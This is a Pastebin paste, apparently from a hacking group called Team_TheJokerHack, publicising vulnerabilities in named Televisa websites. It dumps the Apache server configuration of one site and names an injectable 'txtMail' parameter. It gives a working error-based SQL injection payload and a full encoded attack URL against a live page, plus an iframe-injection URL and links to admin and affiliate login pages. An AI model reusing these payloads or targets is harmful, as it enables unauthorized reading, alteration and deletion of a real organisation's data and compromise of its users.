Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Yei Zeta post 2013
- addme:https://www.facebook.com/yei.zeta.5
- Team_TheJokerHack
- Server Version: Apache/2.2.21 (CentOS) DAV/2 PHP/4.4.9
- Server Built: Nov 14 2011 19:44:22
- Module Magic Number: 20051115:3
- Hostname/port: www.televisa.com.ar:80
- Timeouts: connection: 120 keep-alive: 120
- MPM Name: ITK
- MPM Information: Max Daemons: 256 Threaded: no Forked: yes
- Server Architecture: 32-bit
- Server Root: /etc/httpd
- Config File: /etc/httpd/conf/httpd.conf
- Server Built With:
- -D APACHE_MPM_DIR="server/mpm/prefork"
- -D APR_HAS_SENDFILE
- -D APR_HAS_MMAP
- -D APR_HAVE_IPV6 (IPv4-mapped addresses enabled)
- -D APR_USE_SYSVSEM_SERIALIZE
- -D SINGLE_LISTEN_UNSERIALIZED_ACCEPT
- -D APR_HAS_OTHER_CHILD
- -D AP_HAVE_RELIABLE_PIPED_LOGS
- -D HTTPD_ROOT="/etc/httpd"
- -D SUEXEC_BIN="/usr/sbin/suexec"
- -D DEFAULT_ERRORLOG="logs/error_log"
- -D AP_TYPES_CONFIG_FILE="conf/mime.types"
- -D SERVER_CONFIG_FILE="conf/httpd.conf"
- SQLI PROBRABLE:
- http://www.televisanetworks.tv/reccontrasenia.asp
- Dependiendo de la base de datos back-end, la configuración de conexión de base de datos y el sistema operativo, un atacante puede montar uno o más de los siguientes tipos de ataques con éxito:
- Lectura, actualización y borrado de datos arbitrarios de la base de datos
- Ejecución de comandos en el sistema operativo subyacente
- Lectura, actualización y eliminación de tablas de la base de datos arbitrarios
- Detalles de su Explotacion:
- http://cwe.mitre.org/data/definitions/89.html
- Nombre de parametro:txtMail
- Ataque permanente:
- -1' or 1=1 (select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1)) '
- http://www.televisanetworks.tv/noticiasListado.asp?=-1'%20or%201=1%20(select%201%20and%20row(1,1)%3E(select%20count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x%20from%20(select%201%20union%20select%202)a%20group%20by%20x%20limit%201))%20'
- IFRAME:
- http://www.televisanetworks.tv/coberturaMapas.asp?idc=15&sMapa=%3Ciframe%20src=%22https://www.google.com%22%3E%3C/iframe%3E
- Cookie:
- http://www.televisanetworks.tv/afiliado_acceso.asp
- http://www.televisanetworks.tv/admin/secure/logon.asp
Add Comment
Please, Sign In to add comment